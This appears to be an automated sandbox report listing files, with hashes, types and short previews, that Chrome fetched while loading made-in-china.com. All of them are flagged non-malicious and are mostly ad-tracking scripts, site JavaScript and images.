                                                                                                          MD5:78B3A4445C5C913A617366319A3EA25B
                                                                                                          SHA1:E59BF900F39DED98D067E541F5F6387A37402B53
                                                                                                          SHA-256:A18EBD731B20D7404E2EED45AD15A0E9068EC7C4EB6D95DA6727C086E366227D
                                                                                                          SHA-512:BC7B52645656A97B56D628AEAFB2B446ABB74D23F0219192CF0EB6F3DB9BC6818CB9D7703CC85155DAD2F1F328E67BBBBF7DC2B6FE546EF4B8CB6DECCA3FB66A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://tags.creativecdn.com/VKCPIkUjhj4YmK37qf62.js
                                                                                                          Preview:(async function(){const a="rtbhEvents",b="__rtbh.",c=["uid","sid","aid","eid","lid"],d=31536000000,e=[];if(Array.isArray(window.rtbhEvents)||(window.rtbhEvents=[]),window.rtbhEvents.length&&!window.rtbhEvents.push.prototype)try{function f(a,b="ams"){const d=document.referrer?document.referrer:"";return null===a?void 0:function(e,f,h=null){try{const i=f.filter(a=>!c.includes(a.eventType)&&"init"!==a.eventType);return g(`https://${b}.creativecdn.com/tags/v2?type=json`,{method:"POST",mode:"cors",credentials:"include",referrerPolicy:"no-referrer-when-downgrade",headers:{"Content-Type":"application/json"},redirect:"follow",body:JSON.stringify({v:"v0.1.5",sr:d,su:location.href,th:h?h:a,tags:[...i,...r]})},e)}catch(a){}}}async function g(a,b,c,d){try{const e="function"==typeof c?c:()=>{},f=await fetch(a,b),g=f.status;if(200<=g&&300>g)return e(d?await f.json():await f.text(),f)}catch(a){}}function h(a){try{return JSON.parse(a)}catch(a){return null}}function i(){const b=window[a].filter(a=>a.ev
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1515
                                                                                                          Entropy (8bit):7.494765612785112
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:40EC8D7E6F3AE377E76965C39E951116
                                                                                                          SHA1:3E1F68D03A56C9755B52B12E591F2148F2BCD527
                                                                                                          SHA-256:7F5CEB5D7ABE409E13D02AB872B7425378B54FC9D44C3A59F8DA91E377C2B873
                                                                                                          SHA-512:DAD6EE778CBE4585867CEF2F52BE250564D213C77913A6597C5472A059E7D47E882838A7DB0EEE440C28ECCEAFAA266ADCD32550FF59432125C804B06960D163
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......U......Adobe.d.................................................................................................................................................2.2..........................................................................................!.1.A.Qa".q.2..%.......................1...!q.................?......V...O../...+~....._W....i...nq...d.J.o...{.r.'....T..4.%....vIq;..<....Q.wv&u.'.ok.....N...6..>.........."5..f...@h....%E.G!Z.m..M..$...+c.7........$..$..\.>..Y..SO....Fi.RAu..S..J6(R..R.....o....joqK..l].Q?.[J..a .+..wgQ..c..N.)...A.4..]...,..N%..6..0i.a..X[..q#...)JP}.$....$.H.0E..S.......;iu`..f.p..n...G.I1...{>.=.(.V..uV.S..Qs....q..B.c....H..-.{.S.)IiA.......?.Y.-.w.n....s.....Q(...R..zZ..@.........'[.&.U.V.Y....B]JW.....v.n5F..U~...v.."...58..`.}...H~....~:..[...I.y.G...o...\.c1.3|........6s$M..9. .S...)>B=....5.J...U.....V.+.*...4..u..-..y.I.........o.r....{...'.q....x.~
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9129
                                                                                                          Entropy (8bit):7.908081759072639
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0BB75D1A001DDD2E23F56F91D69C80C9
                                                                                                          SHA1:E83141EABCCEDD1BAD417DB02333B8A70A3BA06A
                                                                                                          SHA-256:56686AD31D97C0F63FEBDB6A794BB515CFFA4F6A4FCE867C875D27E32F43FABD
                                                                                                          SHA-512:0670ADA929254356EF2983D6A010FB9038E0B0C341143F211C1216ABB4A4DE6B97FD6168412362DB818E115582B3F1EF9C1567C61E990FABC9FC01281247324E
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/8f4j00QNhYRiEGmlVu/Bathtub1727707338000.jpg
                                                                                                          Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="148176D290450CD8F82EC28362A2392D" xmpMM:DocumentID="xmp.did:208468317C7A11EF8B4AE2AB231EDEA9" xmpMM:InstanceID="xmp.iid:208468307C7A11EF8B4AE2AB231EDEA9" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4a279d17-ded8-a44b-b580-84c9da147487" stRef:documentID="adobe:docid:photoshop:a66fa3e9-33af-d341-a16c-aea6cf21ebe0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):276280
                                                                                                          Entropy (8bit):5.340730715938129
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0C2C0C046AB7E1B838D74A9A1E4574A0
                                                                                                          SHA1:81F59F1E47E149D6D11C45F1BA8FDF6E181185D3
                                                                                                          SHA-256:1280E3B275C524F0DBF0FBC5A0163042C680C95A36453C843028F8BE46DB8B6E
                                                                                                          SHA-512:B9B37A162CD3A2C7A8B956782B836970E7174687BC9E8F6925598B071417C8AAD377C2BD355CC9A6A05FBE3E0D8CE48B6304EB241193CA8EAE959EADFE0966BC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/nail/pc/ssr/client/header-home_25a18ca7.js
                                                                                                          Preview:function _typeof(n){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},_typeof(n)}!function(n,t){"object"==(typeof exports==="undefined"?"undefined":_typeof(exports))&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n||self).headerHome=t()}(this,function(){"use strict";function c(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}function f(n){return f="function"==typeof Symbol&&"symbol"==_typeof(Symbol.iterator)?function(n){return _typeof(n)}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":_typeof(n)},f(n)}function d(n){var t=function(n,t){if("object"!==f(n)||null===n)return n;var e=n[Symbol.toPrimitive];if(void 0!==e){va
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (8728), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):8728
                                                                                                          Entropy (8bit):5.647966605427006
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:093D6E74FC6A78E885AB062DD63986F5
                                                                                                          SHA1:EE5547CF4D205F998B2C7FB7D3A38736751FE0C3
                                                                                                          SHA-256:D9680841D6C5752CB7A666DFFB5E7047150116F62F463781EA419BC78B235E40
                                                                                                          SHA-512:3F0B429CF4F5C93439A420569383385583DFBE643F6D54E322A1FA87A7AE62D834F5C2ACF7BA19FEC1A08A2A1E915114060E9F9400FC87D8B31FF269273A9E88
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://td.doubleclick.net/td/rul/731984560?random=1728320974780&cv=11&fst=1728320974780&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4a20v9184771098z86376862za201zb6376862&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.made-in-china.com%2F&ref=https%3A%2F%2F8zt.oyvysi.com%2F&label=v7ktCOKJmaMBELDlhN0C&hn=www.googleadservices.com&frm=0&tiba=Made-in-China.com%20-%20Manufacturers%2C%20Suppliers%20%26%20Products%20in%20China&npa=0&pscdl=noapi&auid=1164326211.1728320973&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1
                                                                                                          Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":2592000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1164326211.1728320973","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1164326211.1728320973\u0026ig_key=1sNHMxMTY0MzI2MjExLjE3MjgzMjA5NzM!2sZyui0A!3sAAptDV7hDhQ7","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sBffkTg!2sZyui0A!3sAAptDV7hDhQ7"],"userBiddingSignals":[["814629365","819671523"],null,1728320976125718],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=166939105562\u0026cr_id
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 25 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1027
                                                                                                          Entropy (8bit):6.12127425733408
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0922B1B76010EEDD46763992865392BD
                                                                                                          SHA1:B7DE399F0134C34BBA4DE3C4B9588B8B8709444A
                                                                                                          SHA-256:3B9970B0F5BAC6657119E876249381E5649B29E1A825BCE70AFD36D9B73C2553
                                                                                                          SHA-512:C961B19A3EFD22402FF7B84CA928D660D7ACDA350471662807BBB6C5DB6611D0C00D084A11F50B45015ECADEC6AD7642EFBC5821AA10D8F69A9A2B8EEAB9F5AA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/img/home-2019/ani-arr_4b4e8f60.png
                                                                                                          Preview:.PNG........IHDR................K....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:59CB098D90CF11E9A14EEB058A45B180" xmpMM:DocumentID="xmp.did:59CB098E90CF11E9A14EEB058A45B180"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59CB098B90CF11E9A14EEB058A45B180" stRef:documentID="xmp.did:59CB098C90CF11E9A14EEB058A45B180"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.sN....sIDATx.b...?...a ..b/ ~.,..@=...&@...EQd@>.....+.!.D...i.N..m.V....(.l.h..21... .D....P;.E..`..........;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.331124583784423
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:09CF29547D2F32D681DDDBC38FF9654E
                                                                                                          SHA1:47EB8F5431B7D9D4EE404474396560FEA6C96B04
                                                                                                          SHA-256:7F1801691B8215839FFEE10BC99E61A98691066F37CCF63957F00C984BC61131
                                                                                                          SHA-512:B99ABCA23D2721034342011E4E0CE1443C18902529CFED8AEB680D801560C2129725422DE4C8E63971B3C41C26C0B683ED9AE9B59280AA11D767CFBD1B2676F8
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/business/global/ratio_dd22365a.js
                                                                                                          Preview:void function(){var i=1;if(window.devicePixelRatio){i=window.devicePixelRatio}var e=new Date;e.setFullYear(e.getFullYear+1);try{document.cookie=["dpr=",i,"; domain=",".",document.domain.match(/[\w\-]+\.[\w\-]+$/)[0],"; path=/; expires=",e.toUTCString()].join("")}catch(i){}}.call(this);.//# sourceMappingURL=../../../../__sources__/common/js/business/global/ratio_dd22365a.js.map.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2503
                                                                                                          Entropy (8bit):7.89326602166758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B7FDEB0478A6BB0DA3A4EE03902346A1
                                                                                                          SHA1:6CE9B477A79F04C4E166EE0C2E38A2B0313D2345
                                                                                                          SHA-256:BA284652D465752C1C80C84D4BC927E52D0D78BE777A1ACAB181352361AF072A
                                                                                                          SHA-512:5C4AEF24C38D4A02811BABB5506F8A64D8E39CA8CB6F27BFC87A77BE5AD536F07A841EB0AA04E4A9A7B4068D2540C4CF65449BB0ABF078E8584FE0BF42FDF67C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR...2...2......?......pHYs.................sRGB.........gAMA......a....\IDATx............;.....r,...... hAPB.V+M.Bl....F.ZLJm.J.....j.6b.'........d....=....3C.F.M#.f..of2..........w>%).K.._.L..l."2.0Ed.a..d......H2.=.9....8~k.......i;~........]...o..Dv...>.?".P.U.jP...4.$s.M..3)....V....Z......+.L.r....%...v.'".I..A..O..|)...R?.:...rG.._o..+M.jLYZ..T..zPg........u.B..I.!.Y2H{.D-..0..;...btp..&..W...N..M.)B`.Nf.r.v/8..x...A.{.R....r...J.*....H*..GVv.uK.h.p.9.d.D.;.aR......?.3.....|:U..1.P.Td..)..D.x\...79.5..\.q=......}cD.... ..ZZ-*.:#...J....l...(.$.h.x$H..C(....M....y|qDR.o$"D.........g.XR'%U.....)..L_.^......I..'((.`........Cd.M.C.D..nJ.Yv.U..k..Fx..o\Aeu.7]..W...-.Yu.R.....;o..{...:.x.Q....zp?#./q)<..V..=h.AV...=...pg.Q.8.h.]..2....Ci....{DBn......<f...i.s.DEat....8.....%....F....b....MT........"..{p...z.M.L.|Z.\.h.z1|P\UKW. ~.W2_.N..rxp.z.".$wbX.=.9...8B...%....hr.....%....r.Ee?.z. j"$..2..;dm't.i.K....r.cfu!aECD*T.3.-.P>..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (451), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):451
                                                                                                          Entropy (8bit):5.175708776160106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4D6A40A696D1ABBDF25CD121AA88B10E
                                                                                                          SHA1:F6288297D9CD2BD6FB5024E8B116B83C0C2050BE
                                                                                                          SHA-256:A61DDD7C4DB00FA694A870C95E1D2AFA9FA3BF7034D92C8F68A341FC21EDB053
                                                                                                          SHA-512:113E5513D9BB75093DDC37D801C561D092F9DF76F6DC7DFECA38FF74435D4FE796A569DF62800E7BE87873A446E313D90A6142AEF6F93D4B50C6FFC51696308C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/floating-cart.11c2f1b3c1cb2ba0d418.js
                                                                                                          Preview:"use strict";(self.webpackChunknew_bedford_framework=self.webpackChunknew_bedford_framework||[]).push([[9528],{96418:function(e,n,t){t.r(n);var a=t(59440),o=t(16024);n.default=function(e){(0,o.A)().then((function(){var n=(0,a.T)(window,"Y.Squarespace.Singletons.ShoppingCart",null);n&&(n.on("item-added",(function(n){e.classList.remove("hidden")})),n.after("load",(function(n){n.target.get("totalQuantity")>0&&e.classList.remove("hidden")})))}))}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):4.270340411085111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6A59206692CE3585653B3232CAC4A50C
                                                                                                          SHA1:DFF30E7CC4801BAFA10BC1D777E2CFA20C3C79F6
                                                                                                          SHA-256:AA68B21018C7D67F9370ECB380065765E1CE2292EA14C46FD3CDA4E551F80835
                                                                                                          SHA-512:D25452939C06D26A29FE39E4BF8ACAECB8684D88D8F5C740C7F222C921F36BCF3EBF0895565E9EC23BA19930A6171412006B555324F5581806E65775EA08C51C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://f.creativecdn.com/.well-known/interest-group/permissions/?origin=https%3A%2F%2Fasia.creativecdn.com
                                                                                                          Preview:{"joinAdInterestGroup": true,. "leaveAdInterestGroup": true}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15254)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15370
                                                                                                          Entropy (8bit):5.619780212026437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E4C231865F06B3A0BA2092032EDFB606
                                                                                                          SHA1:5DCAB2A1BAE733C8432C97F8796A4E4767DE8CD7
                                                                                                          SHA-256:B8EF1BB23B8188D3AE4083B8A3C20CC92C75469844F1FAF81F48149465825D00
                                                                                                          SHA-512:F28829E23C260207BFB8409AADCD672FFECD23B525FB6E51852FB21E05C3F718C43B0C3F33C1424D78BF13E726A1E9598495B77F54817801B34A1B0F21D25E0A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/business/plugs/socialPlugin/socuetyLogin_057e8a94.js
                                                                                                          Preview:document.domain="made-in-china.com";void function(){var a=navigator.userAgent.toLowerCase().match(/(ipod|ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(document.location.href.indexOf("m.made-in-china.com")!==-1){a=true}var o=a?"//m.made-in-china.com/login":"//login.made-in-china.com";var e="//login.made-in-china.com/join-sns/?flag=0";var r="//login.made-in-china.com/logon.do?xcase=doSocialLogon";var s=window;var i=function e(){this.mapping={key:null,name:null,firstName:null,lastName:null,gender:null,country:null,city:null,userName:null,email:null,companyName:null,phoneNumber:null,socialWebsite:null,timeZone:null}};i.prototype.clsName=null;i.prototype.description=null;i.prototype.tip=null;i.prototype.fireLogin=null;i.prototype.redirect=null;i.prototype.setMapping=function(e){var i;for(i in this.mapping){if(e[i]){this.mapping[i]=e[i]}}};i.prototype.getMapping=function(e){return this.mapping};i.prototype.destroyMapping=function(){this.m
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4853), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4853
                                                                                                          Entropy (8bit):5.826969658209334
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:CAACB400B211AB986B13E6D4F1F7217E
                                                                                                          SHA1:91BBD299BED6BA3150504AD1A39704E7F511602D
                                                                                                          SHA-256:91C91C37285CAE2FFD419BDC9164D90AA158C0C7E0A8270293E7F155511D99D3
                                                                                                          SHA-512:867C82D1ED3C41C52DB965B96B602D5A3FE10E48623D636207F8B56B7051720C4A6991C5E3B11D1482B3604867497A01EF858148B0619BF085B1E2EDC800A025
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/731984560/?random=1728320974780&cv=11&fst=1728320974780&bg=ffffff&guid=ON&async=1&gtm=45be4a20v9184771098z86376862za201zb6376862&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.made-in-china.com%2F&ref=https%3A%2F%2F8zt.oyvysi.com%2F&label=v7ktCOKJmaMBELDlhN0C&hn=www.googleadservices.com&frm=0&tiba=Made-in-China.com%20-%20Manufacturers%2C%20Suppliers%20%26%20Products%20in%20China&npa=0&pscdl=noapi&auid=1164326211.1728320973&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4
                                                                                                          Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                          No static file info